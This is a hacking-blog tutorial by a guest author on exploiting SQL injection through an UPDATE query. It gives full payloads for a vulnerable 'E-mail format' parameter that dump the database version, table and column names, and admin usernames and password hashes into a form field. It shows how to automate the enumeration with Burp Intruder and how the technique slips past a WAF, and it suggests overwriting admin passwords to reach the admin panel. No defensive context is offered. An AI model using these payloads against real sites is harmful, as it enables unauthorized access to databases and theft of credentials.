SQL Injection With Update Query
We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have already discussed Basic SQL Injection With Union Based, Blind SQL Injection, Time Based SQL Injection and also discussed common problems and their solutions related to SQL Injection. However, this time Daniel Max a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.
Most of the tutorials, You see on the web usually explains to use the SELECT method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, For example a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.
Requirements
- Tamper Data
- Burp Suite
- Know how of MySQL (w3schools.com recommended)
Vulnerable parameter is "E-mail format: " value.We would use Tamper data to intercept and change the values.
Here is a screenshot:
After we click ok we get an error the following error:
First we want to find the exact database version, but what would be the easiest way.
We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).
Screenshot of version query:
Screenshot of the rendered content with database answer:
Now that we know how to create our query, lets get the tables.
Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '
Tables Query:
Screenshot of the rendered content with database answer:
Three tables, strange !? Lets check that again.We use count.
Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '
Screenshot of get tables count query:
Screenshot of the rendered content with database answer:
Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.
We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"
Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '
Screenshot of burp settings:
Thats it. And now you just get columns the same way with Burp Suite.
Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '
Just increment n with Burp Suite.
Values :
Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '
Just increment n with Burp Suite.
That's it , simple and yet effective . I used this because , waf blocked -- and --+ so I wasn't able to close and comment out query.
About The Author
This article has been written by Daniel Max, He is a security researcher from Bosnia, He is willing to actively contribute to RHA.